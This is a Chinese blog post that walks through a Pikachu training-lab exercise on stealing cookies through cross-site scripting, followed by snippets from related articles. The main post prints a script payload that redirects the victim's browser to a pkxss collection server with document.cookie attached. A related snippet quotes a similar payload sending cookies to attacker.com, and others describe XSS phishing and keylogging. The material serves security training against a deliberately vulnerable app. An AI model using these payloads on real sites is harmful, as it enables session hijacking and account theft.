Pikichu-xss实验案例-通过xss获取cookie

利用pikachu后台进行XSS攻击获取cookie
原创 已于 2024-10-02 21:14:17 修改 · 1k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#xss #前端

于 2024-10-02 20:45:30 首次发布

原理图:

pikachu提供了一个pkxss后台;

该后台可以把获得的cookie信息显示出来;

查看后端代码cookie.php:就是获取cookie信息,保存起来,然后重定向跳转到目标页面;修改最后从定向的ip,改为自己测试用的IP地址;

对此,构造攻击payload, 获取到cookie ,然后从定向跳转到pkxss后台,pkxss后台把数据保存后,重新重定向回到被攻击的页面。

<script>document.location='http://192.168.3.224:8082/pkxss/xcookie/cookie.php?cookie='+document.cookie;</script>
//192.168.3.224  代表pkxss 的后台   document.cookie表示获取被攻击平台的cookie
//拿到cookie后,重定向到pkxss后台把数据保存起来

得到攻击信息。

Pikachu-XSS漏洞之cookie获取、钓鱼结果和键盘记录实战记录
m0_74608722的博客
08-17 2771
我们可以向用户发送一个链接请求,用户点击后会给我们提前搭建好的后台发出一个请求,后台收到请求后会返回一个身份信息验证的Basic头部,如果用户安全意识不够,输入了敏感信息:用户名和密码,然后这些就会被发送到pkxss后台。首先我们登录进去,我们发现界面和get型的是完全一样的,我们随便输入点东西:发现并没有在url里面显示,那怎么回事那,其实这个就是post型的,请求是通过post的方式发送的。**好了,所有的Pikachu模块我们都已经练习完了,但是还遗留下一些实战训练,我们今天就来一口气完成!
pikachu靶场之反射型跨站脚本漏洞xss获取cookie信息,键盘记录
2301_77091612的博客
04-29 2435
xss获取Cookie信息,xss的类型最全
XSS-窃取Cookie pikachu靶场
starhei.zxy的博客
07-23 612
1.在https://xssaq.com/ ⽹站注册账号并登陆,点击"创建项⽬"并填写项⽬名称...⽴即提交。4.打开⼀个pikachu靶场xss盲打里面将我们刚才复制的script恶意代码输⼊进去。5.pikachu管理员登录后台的操作 登录完成后触发我们插⼊的恶意代码。2.在我的项⽬中选择我们刚创建的项⽬ 点击右上⻆的查看配置代码。6.这个时候平台上可看到其劫持的Cookie信息。3.复制script这⼀条代码。
XSS攻击4----XSS实战操作)
最新发布
一起进步
09-16 1006
本文通过Pikachu平台演示了XSS攻击的多种实战场景:1.搭建XSS后台获取用户Cookie,利用document.location将Cookie发送至黑客服务器;2.POST型XSS攻击需构造钓鱼页面获取登录态Cookie;3.XSS钓鱼攻击通过伪造登录框窃取用户凭证;4.键盘记录功能可捕获用户输入;5.XSS盲打通过后台管理界面触发攻击。实验采用双虚拟机环境模拟攻击链,展示了XSS漏洞的危害性,同时指出HttpOnly属性能有效防御Cookie窃取。文章强调网络安全意识,提醒用户警惕可疑弹窗和下载链
XSS接收cookie
YouthBelief的博客
10-20 783
XSS接收cookie环境1.getcookie.php2.getcookie.js3.存在xss的页面写入4. 攻击尝试5.结果总结 环境 VPS winserver2012R2 phpstudy apache php 靶机 win10 phpstudy apache php pikachu vps放置 1.getcookie.php <?php $ip = getenv ('REMOTE_ADDR'); $time = date('Y-m-d g
cookie获取xss
baidu_41942652的博客
04-28 507
首先打开pikachu平台,找到反射型xss(get)章节。 打开后台 登录账号 将字数限制去掉 然后输入一个的script语句 然后可以在后台看见用户访问cookie信息 这样一次cookie获取就成功了! ...
04-xss获取cookie实验
tianxiadiiw的博客
05-06 728
攻击者服务器:192.168.74.134,将获取cookie数据保存到该服务器的数据库中,运行PHP代码暴露一个接收Cookie的URL地址。正常Web服务器:192.168.74.133,用于正常的用户访问的目标站点,用户可以在上面阅读或者发表文章。但是只有几分钟的时间进行操作,期间可以查看数据库,建立用户,用户向管理员举报有问题的页面,管理员前去访问,攻击者则直接获取到了管理员的cookie。攻击者在回帖中输入文章内容,并加入JavaScript开始进行xss攻击,3、获取管理员 Cookie
jQuery-with-XSS 检测jQuery版本是否存在XSS漏洞
09-29
动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受...
精选资源
【PDF-XSS攻击】Java项目-上传文件-解决PDF文件XSS攻击
04-07
PDF-XSS实例文件
Bug Bounty Tip - i春秋Self-XSS变废为宝的奇思妙想
04-30
假设一个攻击者想要通过Self-XSS获取某个目标网站上用户的敏感信息或者执行某些操作。他可以构建如上的页面,并通过各种渠道(如社交媒体、邮件等)诱骗目标用户访问该页面。一旦用户访问了该页面,恶意脚本就会被...
XSS的键盘记录和cookie获取
Williamanddog的博客
01-26 2895
跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混 淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意JavaScript代码,当用户浏览该页 面时,嵌入Web里面的JS代码会被执行,从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的 攻击。 在一个Web页面上,有一种很常见的功能是将用户输入的内容输出到页面上。但是如果这里输入的内容 。
pikachu-XSS
koala_king的博客
01-16 310
pikachu
web渗透测试-从入门到放弃-04XSS-Cookie获取/钓鱼
lx1315998513的博客
10-31 965
GET型XSS利用:cookie获取 用户与站点 用户——>访问XSS页面,触发脚本——>存在XSS漏洞的站点(pikachu) http://127.0.0.1(在触发脚本的同时,脚本会将窃取的cookies数据发送到攻击者搭建接受cookie的后台网站:http://192.168.10.130/pikachu/pkxss) 用户<——返回“带恶意JS”的页面<——存在...
Pikachu漏洞靶场系列之XSS
weixin_45868644的博客
09-10 5382
文章目录概述跨站脚本漏洞常见类型XSS漏洞的测试流程搭建XSS后台一、反射型XSS(Get)实验案例-获取Cookie二、反射型XSS(Post)三、存储型XSS实验案例-钓鱼攻击实验案例-键盘记录什么是跨域跨域-同源策略为什么要同源策略四、DOM型XSS五、DOM型XSS-X六、XSS之盲打七、XSS之过滤转换的思路编码的思路XSS之htmlspecialcharsXSS常见防范措施XSS之href输出XSS之js输出总结XSS常见Payload 概述 1、XSS就是攻击者在web页面插入恶意的Scri
XSS 攻防案例
weixin_51559599的博客
11-09 185
​ 用户会话令牌利用Cookie 来实现的,Cookie 是存储在浏览器端的一小段文本,相当于身份证,会有窃取和欺骗的风险。​ 可以利用XSS 攻击窃取到浏览器里的Cookie 信息。​ 由于XXS 触发需要浏览器客户端用户(受害者)参与,攻击者不清楚何时何地会触发漏洞,这个过程一般被成为XSS 盲打。
XSS解析——pikachu靶场
Aquarius_ego的博客
05-10 1347
XSS讲解——用pikachu靶场复现xss的四种危害:劫持用户cookie、框架钓鱼、挂马、键盘记录
【web-ctf】ctf-pikachu-XSS
一个努力生活的人的博客
06-27 3099
XSS-pikachu
Pikachu——Xss钓鱼
m0_60767986的博客
04-23 8741
前端js代码限制输入框只能提交20个字段,将它修改为100即可(当然,这是get型xss,可以直接在url传参处添加攻击语句)提交攻击语句后发现,跳转回了靶场首页,网页debug发现:第一:请求了指定的钓鱼页面的url,并在后面携带了我的cookie信息第二:跳转回靶场首页(前面“靶场cookie获取的额外操作”的结果,用来抵消受害者的怀疑)
渗透实战:利用XSS获取cookie和密码
ericalezl的博客
06-13 867
之后点击轮询可以看到目标向的域名发送的请求,找到一个请求中带有 secret 和 session 字样的就是 cookie 信息。将复制的域名放到 fetch 中,body 为 document.cookie,就是访问这个留言板的用户的 cookie访问 my-account 转包,将 cookie 替换重放即可登录管理员账户。留言板位置找到注入 xss 的位置后,构造获取对方密码的请求。输入的任何单引号双引号尖括号都会被 unicode 编码。直接换另一种代码执行方式。里面可以执行 js 代码。
xss获取cookie
01-22
### 利用XSS攻击窃取Cookie的方法 在存在跨站脚本(XSS)漏洞的情况下,攻击者可以通过注入恶意JavaScript代码来读取并传输受害者的HTTP Cookie给攻击者控制的服务器。具体过程如下: 一旦成功执行了带有恶意载荷的脚本,该脚本可以访问文档对象模型(DOM),进而获取存储于浏览器中的敏感数据,例如`document.cookie`属性所保存的信息[^1]。 ```javascript <script> var img = new Image(); img.src="http://attacker.com/steal?cookies="+encodeURIComponent(document.cookie); </script> ``` 此段代码创建了一个新的图像元素,并将其源设置为攻击者的URL加上当前页面所有的Cookies作为查询参数的一部分。由于大多数情况下图片加载不会被用户察觉,因此这种手法具有很强隐蔽性。 然而值得注意的是,在现代浏览器中,默认情况下同源政策会阻止不同域之间的资源交互;而且HttpOnly标志位能够防止JavaScript直接读取特定类型的cookie,从而大大降低了上述方法成功的可能性[^2]。 ### 防御措施 为了有效地抵御此类攻击,开发者应该采取一系列预防性的编码实践和技术手段: - **输入验证与清理**:确保所有来自客户端的数据都经过严格的校验和转义处理后再用于构建HTML响应内容。 - **采用Content Security Policy (CSP)**:这是一种额外的安全层,它允许站点管理员声明哪些外部资源可以在其网页上运行,有助于减少潜在风险。 - **设置HttpOnly Cookies**:对于那些不需要由JavaScript存取的重要凭证信息(如Session ID),应当标记为HttpOnly以避免它们成为JS可触及的目标。 - **定期审查依赖项**:保持使用的第三方库处于最新版本状态,及时修补已知的安全缺陷。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值